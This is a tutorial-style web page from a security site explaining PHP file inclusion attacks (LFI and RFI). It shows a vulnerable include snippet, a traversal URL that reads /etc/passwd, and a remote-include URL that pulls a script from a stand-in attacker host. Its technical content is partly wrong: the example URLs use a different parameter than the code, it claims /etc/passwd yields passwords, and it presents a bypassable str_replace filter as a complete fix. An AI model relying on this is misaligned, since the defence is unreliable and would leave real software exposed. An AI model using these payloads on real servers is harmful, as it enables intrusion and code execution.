• Register

File inclusion attack is an attack in which an attacker can execute a file in a webpage. This type of attack can happen due to the improper filtering of user data supplied. Due to this vulnerability the attacker can execute script, stole data. By leveraging the vulnerability in PHP an attacker can execute command to do different attacks.

File inclusion attack are of two type :

  1. Local File Inclusion.
  2. Remote File Inclusion.

 

Local File Inclusion (LFI)

In LFI the attacker can take the advantage of improper filtering and can take advantage. The following PHP vulnerable to LFI :

<?php
$file = $_GET['file'];
if(isset($file))
{
include(“pages/$file”);
}
else
{
include(“index.php”);
}
?>

The original request will look like this:
http://www.test.com/index.php?id =contact.php

The attacker will execute the following script:
http://www.test.com/index.php?id =../../../../etc/passwd
This will give the password on the server

The countermeasure of this attack is to modify the php $file variable script as follows:
$file = str_replace(‘../’, ‘ ’, $_GET[‘file’]);
The LFI attack will not work after replacing above line.

Remote File Inclusion (RFI)


Remote File Inclusion (RFI) is an attack that targets the computer servers that run Web sites and their applications. RFI exploits are most often attributed to the PHP programming language used by many large firms including Facebook and SugarCRM. However, RFI can manifest itself in other environments and was in fact introduced initially as "SHTML injection". RFI works by exploiting applications that dynamically reference external scripts indicated by user input without proper sanitation. As a consequence, the application can be instructed to include a script hosted on a remote server and thus execute code controlled by an attacker. The executed scripts can be used for temporary data theft or manipulation, or for a long term takeover of the vulnerable server.

Remote File Inclusion (RFI) is caused by insufficient validation of user input provided as parameters to a Web application. Parameters that are vulnerable to RFI enable an attacker to include code from a remotely hosted file in a script executed on the application’s server. Since the attacker’s code is thus executed on the Web server it might be used for temporary data theft or manipulation, or for a long term takeover of the vulnerable server.

The RFI attack vector includes a URL reference to the remotely hosted code. Most attacks include two steps.

  • In the first step, the attack vector references a simple validation script, usually capable of printing some distinguished output to the HTML page. If the validation script is successfully executed by the server under attack,
  • then the attacker proceeds with a second vector that references the actual payload script. The servers hosting the script are either compromised servers or file sharing services.

The remote file inclusion attack allow an attacker to execute from anywhere a malicious file/script.

The vulnerability exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website. With RFL attack an attacker can get access of the server.

Let the vulnerable page is :
http://www.test.com/index.php?page =office
This web page is getting  a document in the text format from server which include php include function to get the page.
The attacker can execute a script instead of the genuine page as follows:
http://www.test.com/index.php?page =http://www.hackersite.com/maliciousscript.txt

Preventing File Inclusions (RFI - LFI) Vulnerabilities

The most common protection mechanism against RFI attacks is based on signatures for known vulnerabilities in the Web Application Firewall (WAF). Detection and blocking of such attacks can be enhanced by creating a blacklist of attack sources and a black-list of URLs of remotely included malicious scripts:

  • Advanced knowledge of RFI attack sources enables the WAF to block an attack before it even begins.
  • A blacklist of the referenced URL enables the WAF to block exploits targeting zero-day vulnerabilities of applications.
  • The blacklist of IPs constructed from the RFI attack observations could be used to block other types of attacks issued from the same malicious sources.

Guests Online

We have 451 guests and no members online

CORE Impact Professional

Logo Core ImpactCORE Impact Professional is the most comprehensive software solution for assessing and testing security vulnerabilities throughout your organization.

 
 

Read More...

IBM Security AppScan

Logo IBM Rational AppScanIBM Rational AppScan Enterprise is a scalable solution to help resolve application security vulnerabilities, offering recommendations to simplify remediation.

 

Read More...

HP WebInspect

Logo - HP WebInspectHP WebInspect gives security professionals and security novices alike the power and knowledge to quickly identify and validate critical, high-risk security vulnerabilities.

 

Read More...

Acunetix WVS

logo acunetix web application securityAcunetix Web Vulnerability Scanner (WVS) is an automated web application security testing tool that audits web applications by checking for hacking vulnerabilities. 

 

Read More...

w4rri0r - Hacking Is Not A Crime - It's an art of Awareness

\/ w4rri0r - Hacking Is Not A Crime - It's an art of Awareness \/ -  w4rri0r work in the dark, w4rri0r do what w4rri0r can, w4rri0r give what w4rri0r have, w4rri0r doubt is w4rri0r passion and w4rri0r passion is w4rri0r task. The rest is the madness of art \/ w4rri0r \/ 

\/ w4rri0r.com \/ are the great resource for information security professionals and researcher. \/ w4rri0r \/ offers a extensive variation of information security services that include SECURITY EXPLOITS (Bug or Vulnerability), SECURITY ADVISORIES (Security Alerts), SECURITY RESEARCHER TOOLBOX (Freeware, Shareware & Open-Source), SHELLCODE (Attacker Controller - Chunk of Data), SECURITY TRAINING (Educational Purpose), SECURITY NEWS (Security Recent or Important Events) and with this group you can be assured that you’re in the right hands. \/ w4rri0r gr0up \/  efforts being endorsed and appreciated by administrators, security researchers and members of various underground hacking groups and communities worldwide.

\/ w4rri0r mission \/ are to make the information systems more secure, more aware, more reliable and protect against possible security breaches.